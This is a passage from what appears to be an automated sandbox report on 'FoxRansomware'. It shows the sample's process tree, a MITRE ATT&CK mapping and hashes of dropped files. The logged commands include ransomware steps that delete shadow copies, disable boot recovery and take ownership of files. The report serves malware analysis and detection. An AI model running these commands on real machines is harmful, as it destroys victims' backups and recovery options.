  Command line: cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 3040
  Command line: takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin"
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 2184
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000008V.bin" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 7692
  Command line: yMelI2Cu.exe -accepteula "0000008V.bin" -nobanner
Level 1  C:\Windows\SYSTEM32\cmd.exe  PID 6084
  Command line: C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\wiCcwVPm.bat"
  Signatures: Suspicious use of WriteProcessMemory
Level 2  C:\Windows\system32\vssadmin.exe  PID 7456
  Command line: vssadmin Delete Shadows /All /Quiet
  Signatures: Interacts with shadow copies
Level 2  C:\Windows\System32\Wbem\WMIC.exe  PID 7732
  Command line: wmic SHADOWCOPY DELETE
  Signatures: Suspicious use of AdjustPrivilegeToken
Level 2  C:\Windows\system32\bcdedit.exe  PID 7892
  Command line: bcdedit /set {default} recoveryenabled No
  Signatures: Modifies boot configuration data using bcdedit
Level 2  C:\Windows\system32\bcdedit.exe  PID 7908
  Command line: bcdedit /set {default} bootstatuspolicy ignoreallfailures
  Signatures: Modifies boot configuration data using bcdedit
Level 2  C:\Windows\system32\schtasks.exe  PID 7924
  Command line: SCHTASKS /Delete /TN DSHCA /F
Level 1  C:\Windows\system32\vssvc.exe  PID 7504
  Command line: C:\Windows\system32\vssvc.exe
  Signatures: Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)
Defense Evasion
  File and Directory Permissions Modification (1)
  Indicator Removal (2)
    File Deletion (2)
  Modify Registry (2)
Downloads
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\#FOX_README#.rtf
  Filesize: 8KB
  MD5: 916fdcec4c71390dd522013c011b1f6c
  SHA1: 2c6203664322516061f32d5c0886579b7864f837
  SHA256: 6b0d0c27b914d2f5716f7ebd331f0cd7baacb365f8378f184307cc4c617c0337
  SHA512: fec2f685b7867e8132875c0ddb5089cedb892882a4358a4b9c72d75d71dc0a6eb66089eb4fb39bac26911218b6a3ca85a099d69b492171438dba2331be3bef11

  Filesize: 3KB
  MD5: 815980bad8bb4bf259f913e4f6645642
  SHA1: 1e7f5f6ad4bfe60461e04ec7f4e573b9d9632836
  SHA256: a0e92f0ce6a8fe5d5e276a1837886cd09ea5404e6f3ff2e806285cad3c036007
  SHA512: cd7644beb8d59288f5d7ad9df087514967ef1cb00c071eb1a30ffdd9c1c94e6962aec9154046838846f8ce86e8ab3ddef11e8010145abc246a806b5cfa29342b

  Filesize: 16B
  MD5: 17d432845dc7cb55ac69d75cf72f7f5d
  SHA1: 7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3
  SHA256: a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4
  SHA512: 25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

  Filesize: 1.2MB
  MD5: 268360527625d09e747d9f7ab1f84da5
  SHA1: 09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
  SHA256: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
  SHA512: 07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1

  Filesize: 226B
  MD5: 09786a5a2b21a7db3412141ed0db2250
  SHA1: 70326e9600a6c412318c16282fc553a6c3c5a647
  SHA256: d621d883e6b7d146f2d9769369d5306082c52310c09f2419247bc3bc0c8accd8
  SHA512: 0014f7d63a4e7707f10b1b0c39835a73346a61f125179f1b0fd092479b43f816233ea021b4a3fff85e9ab46db402a498a54ea09b37fcca2bc203240c685c26da

  Filesize: 6KB
  MD5: 2b4dfcd62458a294e53a6f02be70cdd8
  SHA1: 5cbfb42e2c6d751da9c9ed15714151206aae7028
  SHA256: f3ea2995461533b0d5e8a2b7c5fc775e95f7009179d87a05efc2313583966ef2
  SHA512: c2293414f7ed763e79fbcdeba08ca02c0cf339e5f1088c68e05ca98fb254b2113344a8053256f4bbe82a8352aee90f9009733940068cac057c834e83e5660100

  Filesize: 44KB
  MD5: 45587dc4d55d5365acecbc10c89da5e0
  SHA1: fd13cb145ad00cdf46b2ba9a4deeda260e624cb6
  SHA256: 0c2cb064b285a143814716de753465766ae66bb6885dc89bb8530a08323d77a3
  SHA512: d21f9f7c03216d264b81abae20ef249ddfa25f42eaa1059b19e94068e06ba725becaad04eb5aac63ae6f84c0dc3d87e5c8c852b800706befd3a1e5cc9b1c589b

  Filesize: 181KB
  MD5: 2f5b509929165fc13ceab9393c3b911d
  SHA1: b016316132a6a277c5d8a4d7f3d6e2c769984052
  SHA256: 0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
  SHA512: c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  Filesize: 221KB
  MD5: 3026bc2448763d5a9862d864b97288ff
  SHA1: 7d93a18713ece2e7b93e453739ffd7ad0c646e9e
  SHA256: 7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
  SHA512: d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

  Filesize: 265B
  MD5: cc7349ff4465d43c7205550d843c364c
  SHA1: d1b4a68fde1fac380e7740b7395aa6eebf888c2d
  SHA256: 30d2b070121e9c75067980260c1167e0e867506b0c190db878f9749cb4cead0b
  SHA512: 7208fc39828026e7029cb3ab52e21591ac3a08bf4bded4934831c043c44cdc18c505f25b07ade79418b33362b6e9810e628d1ae5bb5be482ca9747648b860467

  Filesize: 260B
  MD5: 0c5c42dfb09581b13b27e13bf4f15fde
  SHA1: 893d27c11734b0fcdb38cdf6f03c5a5ae5a4edca
  SHA256: 948b417b8e0b7babad1db629cd3ee81a2f6eab52e774f47abeca56b37cdda688
  SHA512: 6bd6c1f9cde152fe45dbd31c1e67df488b833fe61482247fb66b2e7968cbae63c3df1147d3af0419be5463b6238ab83b01f01aab7f22607be5f94966a64efe70